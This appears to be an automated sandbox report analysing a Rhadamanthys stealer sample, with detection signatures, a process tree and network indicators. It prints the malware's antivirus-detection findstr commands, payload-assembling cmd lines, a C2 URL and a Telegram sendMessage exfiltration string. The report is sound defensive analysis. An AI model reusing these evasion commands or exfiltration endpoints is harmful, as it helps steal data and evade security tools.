Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PQwHxAiBGt.exe

Overview

General Information

Sample name:PQwHxAiBGt.exe
renamed because original name is a hash value
Original sample name:61151df093ebef01768789ead98ed2ed73ef951162414101b25a9db8129491a3.exe
Analysis ID:1571370
MD5:2f0b358d17ffaf3d1f36eb992003fc68
SHA1:e65fa958100ec8bf4773946c2cd9fa8cd9c5b6d7
SHA256:61151df093ebef01768789ead98ed2ed73ef951162414101b25a9db8129491a3
Tags:C2-at-pastebin-yd1QnTjKexeuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected AntiVM3
Yara detected RHADAMANTHYS Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to detect sleep reduction / modifications
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes many files with high entropy
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious desktop.ini Action
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • PQwHxAiBGt.exe (PID: 8024 cmdline: "C:\Users\user\Desktop\PQwHxAiBGt.exe" MD5: 2F0B358D17FFAF3D1F36EB992003FC68)
    • setup.exe (PID: 8152 cmdline: "C:\Users\user\AppData\Local\Temp\setup.exe" MD5: 9DEF78C3562D533C530706BA4A2D1277)
      • setup.tmp (PID: 7288 cmdline: "C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmp" /SL5="$104AA,1145856,1145856,C:\Users\user\AppData\Local\Temp\setup.exe" MD5: DD78675858275301D48256D22D52CA74)
    • RobertsonDeclined.exe (PID: 8160 cmdline: "C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe" MD5: 9E17536C65B31B33BE6F5840E3945407)
      • cmd.exe (PID: 7424 cmdline: "C:\Windows\System32\cmd.exe" /c copy Me Me.cmd & Me.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7608 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 6156 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 6704 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 6212 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 1672 cmdline: cmd /c md 422648 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 6440 cmdline: cmd /c copy /b ..\Total + ..\Jones + ..\Handed + ..\Norwegian + ..\Beef + ..\Cu + ..\Biology + ..\Busy + ..\Bahamas + ..\Invoice + ..\Practices + ..\Atm + ..\Particularly + ..\Ongoing + ..\Lane + ..\False + ..\Huge B MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Ai.com (PID: 1184 cmdline: Ai.com B MD5: 62D09F076E6E0240548C2F837536A46A)
          • RegAsm.exe (PID: 724 cmdline: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • RegAsm.exe (PID: 8108 cmdline: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
            • svchost.exe (PID: 8060 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • choice.exe (PID: 7416 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
{"C2 url": "https://154.216.17.46:3673/d3b272a7b40f3260049/pfcws03c.cmivs"}
SourceRuleDescriptionAuthorStrings
00000012.00000003.1704529751.0000000005200000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000012.00000003.1705181582.0000000005420000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000012.00000003.1702400594.00000000029F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        00000011.00000002.1707925431.0000000004E60000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          00000012.00000002.1713875821.0000000002EC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            18.3.svchost.exe.5420000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              18.3.svchost.exe.5420000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                18.3.svchost.exe.5200000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                  System Summary

                  barindex
                  Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, ParentCommandLine: Ai.com B, ParentImage: C:\Users\user\AppData\Local\Temp\422648\Ai.com, ParentProcessId: 1184, ParentProcessName: Ai.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, ProcessId: 724, ProcessName: RegAsm.exe
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, ParentCommandLine: Ai.com B, ParentImage: C:\Users\user\AppData\Local\Temp\422648\Ai.com, ParentProcessId: 1184, ParentProcessName: Ai.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, ProcessId: 724, ProcessName: RegAsm.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Me Me.cmd & Me.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Me Me.cmd & Me.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe", ParentImage: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe, ParentProcessId: 8160, ParentProcessName: RobertsonDeclined.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Me Me.cmd & Me.cmd, ProcessId: 7424, ProcessName: cmd.exe
                  Source: File createdAuthor: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\Desktop\PQwHxAiBGt.exe, ProcessId: 8024, TargetFilename: C:\Users\user\AppData\Local\Temp\desktop.ini
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, ParentImage: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, ParentProcessId: 8108, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8060, ProcessName: svchost.exe
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, ParentImage: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe, ParentProcessId: 8108, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8060, ProcessName: svchost.exe

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Me Me.cmd & Me.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7424, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6212, ProcessName: findstr.exe
                  No Suricata rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000011.00000002.1704039560.00000000027A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://154.216.17.46:3673/d3b272a7b40f3260049/pfcws03c.cmivs"}
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeReversingLabs: Detection: 70%
                  Source: PQwHxAiBGt.exeReversingLabs: Detection: 52%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Source: PQwHxAiBGt.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: PQwHxAiBGt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: wkernel32.pdb source: svchost.exe, 00000012.00000003.1704338403.0000000004F40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1704249905.0000000004E20000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000012.00000003.1704529751.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1705181582.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: svchost.exe, 00000012.00000003.1703439346.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1703648304.00000000053F0000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000010.00000000.1644614167.00000000000C2000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe.13.dr
                  Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000012.00000003.1704088858.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1703907796.0000000004E20000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: svchost.exe, 00000012.00000003.1703439346.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1703648304.00000000053F0000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: svchost.exe, 00000012.00000003.1704088858.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1703907796.0000000004E20000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000010.00000000.1644614167.00000000000C2000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe.13.dr
                  Source: Binary string: wkernel32.pdbUGP source: svchost.exe, 00000012.00000003.1704338403.0000000004F40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1704249905.0000000004E20000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wkernelbase.pdbUGP source: svchost.exe, 00000012.00000003.1704529751.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1705181582.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: Setup.pdb source: PQwHxAiBGt.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00247720 SystemParametersInfoW,SystemParametersInfoW,SystemParametersInfoW,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleW,CreateWindowExW,ShowWindow,RegisterDeviceNotificationW,PeekMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,PeekMessageW,4_2_00247720
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_004062D5 FindFirstFileW,FindClose,3_2_004062D5
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_00402E18 FindFirstFileW,3_2_00402E18
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00406C9B
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001ED280 VirtualQuery,GetModuleFileNameW,wcsrchr,wcscpy,FindFirstFileW,wcscpy,LoadLibraryW,GetProcAddress,wcsrchr,_wcslwr,strcpy,FindNextFileW,4_2_001ED280
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\422648\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\422648Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then push ebp4_2_002D60D0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then mov eax, 0035E790h4_2_002D60D0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then sub esp, 1Ch4_2_001C831D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then sub esp, 1Ch4_2_001C8316
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then sub esp, 1Ch4_2_001C8644
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then sub esp, 1Ch4_2_001F2951
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then sub esp, 1Ch4_2_00280FF0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then sub esp, 1Ch4_2_001F2FF9
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then sub esp, 1Ch4_2_001C8FF0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then sub esp, 1Ch4_2_001C9116
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then sub esp, 0Ch4_2_00327970
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then mov eax, ecx4_2_00301B10
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then sub esp, 1Ch4_2_001C7FD6
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then sub esp, 1Ch4_2_001C7FCF
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4x nop then sub esp, 1Ch4_2_001C7FC8

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: https://154.216.17.46:3673/d3b272a7b40f3260049/pfcws03c.cmivs
                  Source: Joe Sandbox ViewIP Address: 104.26.8.44 104.26.8.44
                  Source: Joe Sandbox ViewIP Address: 185.166.143.50 185.166.143.50
                  Source: unknownDNS query: name: ipapi.co
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                  Source: global trafficDNS traffic detected: DNS query: ipapi.co
                  Source: global trafficDNS traffic detected: DNS query: edMKDlxnNIzWufljfi.edMKDlxnNIzWufljfi
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: RobertsonDeclined.exe, 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Motion.3.dr, Ai.com.5.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                  Source: RobertsonDeclined.exe, 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Motion.3.dr, Ai.com.5.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                  Source: RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Motion.3.dr, Ai.com.5.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                  Source: RobertsonDeclined.exe, 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Motion.3.dr, Ai.com.5.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                  Source: RobertsonDeclined.exe, 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Motion.3.dr, Ai.com.5.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: RobertsonDeclined.exe, 00000003.00000000.1325882952.0000000000408000.00000002.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmp, PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
                  Source: RobertsonDeclined.exe, 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Motion.3.dr, Ai.com.5.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                  Source: RobertsonDeclined.exe, 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Motion.3.dr, Ai.com.5.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                  Source: RobertsonDeclined.exe, 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Motion.3.dr, Ai.com.5.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                  Source: RobertsonDeclined.exe, 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Motion.3.dr, Ai.com.5.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                  Source: RobertsonDeclined.exe, 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Motion.3.dr, Ai.com.5.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                  Source: RobertsonDeclined.exe, 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Motion.3.dr, Ai.com.5.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                  Source: RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Ai.com, 0000000D.00000000.1389988787.00000000006C5000.00000002.00000001.01000000.0000000F.sdmp, Motion.3.dr, Ai.com.5.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: svchost.exe, 00000012.00000002.1713419509.000000000083C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://154.216.17.46:3673/d3b272a7b40f3260049/pfcws03c.cmivs
                  Source: svchost.exe, 00000012.00000002.1713419509.000000000083C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://154.216.17.46:3673/d3b272a7b40f3260049/pfcws03c.cmivsx
                  Source: PQwHxAiBGt.exeString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=&parse_mode=Markdown
                  Source: PQwHxAiBGt.exeString found in binary or memory: https://docs.rs/rustls/latest/rustls/manual/_03_howto/index.html#unexpected-eof
                  Source: setup.tmp.2.drString found in binary or memory: https://gcc.gnu.org/bugs/):
                  Source: PQwHxAiBGt.exeString found in binary or memory: https://ipapi.co/json/country_codecountry_name
                  Source: PQwHxAiBGt.exe, setup.exe.0.drString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                  Source: RobertsonDeclined.exe, 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Motion.3.dr, Ai.com.5.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                  Source: PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: Ai.com.5.drString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
